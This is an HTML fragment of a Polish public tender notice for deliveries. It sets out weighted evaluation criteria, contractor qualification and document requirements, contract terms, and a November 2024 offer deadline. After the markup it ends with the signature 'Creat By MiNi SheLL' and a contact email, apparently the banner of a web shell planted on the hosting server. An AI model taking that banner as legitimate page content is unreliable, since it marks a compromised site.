class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującym/i kryterium/ami.<br/><br/><br/>l.p.	<br/>Kryterium	Znaczenie<br/>procentowe<br/>kryterium	Maksymalna ilość punktów jakie może otrzymać oferta<br/>za dane kryterium<br/>1) Cena ( C ) 60 % 60 punktów<br/>2) Częstotliwość dostaw (T) 30 % 30 punktów<br/>3) Wymiana asortymentu w dniu dostawy (R) 10 % 10 punktów<br/><br/>2. Zasady oceny kryterium &#34;Cena&#34; (C).<br/>Przyznane pkt C =	cena (brutto) najniższa x 60 pkt<br/> cena (brutto) badanej oferty<br/><br/>3.Zasady oceny kryterium „Częstoliwość dostaw” (T).<br/>Ocena będzie dokonywana poprzez porównanie zaoferowanej częstotliwości dostaw zawartych w formularzu oferty:<br/>- dostawy codziennie (dni robocze) w godz. 8:00 – 11:00 - 30 pkt.<br/>- dostawy codziennie (dni robocze) w godz. 11:30 – 14:30 - 25 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 15 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 10 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 5 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 1 pkt.<br/><br/>4. Zasady oceny kryterium „Wymiana asortymentu w dniu dostawy” (R).<br/>Wymiana reklamowanego asortymentu w dniu dostawy – oferta, w której Wykonawca zaoferuje wymianę reklamowanego asortymentu w dniu jego dostawy (nie później niż do godz. 14:30) otrzyma 10 punktów. Wykonawca, który nie zaoferuje wymiany reklamowanego asortymentu w dniu dostawy otrzyma 0 punków.<br/>Liczba .punktów określona zostanie na podstawie poniższego wzoru:<br/> C+T+R<br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający zastosuje reguły wynikające z art. 248 p.z.p.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Częstotliwosć dostaw (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wymiana asortymentu w dniu dostawy (R)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku udziału w postępowaniu w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku udziału w postępowaniu w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku udziału w postępowaniu w powyższym zakresie. <br/>4)	zdolności technicznej lub zawodowej:<br/>a) dotyczącej Wykonawcy:<br/>Zamawiający nie stawia warunku udziału w postępowaniu w powyższym zakresie. <br/>Wartości podane w dokumentach potwierdzających spełnienie warunku udziału w postępowaniu w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP z dnia zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych. <br/>b) dotyczącej osób: <br/>Zamawiający nie stawi warunku udziału w postępowaniu w powyższym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 1275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 3 do SWZ;<br/>2)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 1275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 3 do SWZ;<br/>2)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Do oferty Wykonawca zobowiązany jest dołączyć oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego – zgodnie z Załącznikiem nr 2 do SWZ.<br/>2. Oświadczenie, o którym mowa w ust. 1 powyżej stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu, odpowiednio na dzień składania ofert tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe. <br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w ust. 1, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w ust. 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>5. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawca może złożyć tylko jedną ofertę.<br/>2. Treść oferty musi odpowiadać treści SWZ.<br/>3. Ofertę składa się na Formularzu Ofertowym – zgodnie z Załącznikiem nr 1.1 – 1.7 do SWZ. Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ;<br/>2) zobowiązanie innego podmiotu, o którym mowa w Rozdziale X ust. 3 SWZ (jeżeli dotyczy);<br/>3) Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy (jeśli dotyczy).<br/>4)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy chyba, że umocowanie do reprezentacji wynika z dokumentów, o których mowa w ust. 4 poniżej. <br/>4. Oferta powinna być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru chyba że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca w Formularzu oferty wskaże dane umożliwiające dostęp do tych dokumentów w odniesieniu do Wykonawcy jak również w odniesieniu do podmiotów udostępniających zasoby. <br/>5.	Oferta oraz pozostałe oświadczenia i dokumenty, dla których Zamawiający określił wzory w formie formularzy zamieszczonych w załącznikach do SWZ, powinny być sporządzone zgodnie z tymi wzorami, co do treści oraz opisu kolumn i wierszy.<br/>6.	Ofertę należy sporządzić w języku polskim.<br/>7.	Ofertę składa się, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowy zakres zmian zawiera załącznik nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez Platformę https://platformazakupowa.pl/pn/bramki_dps</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-19 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com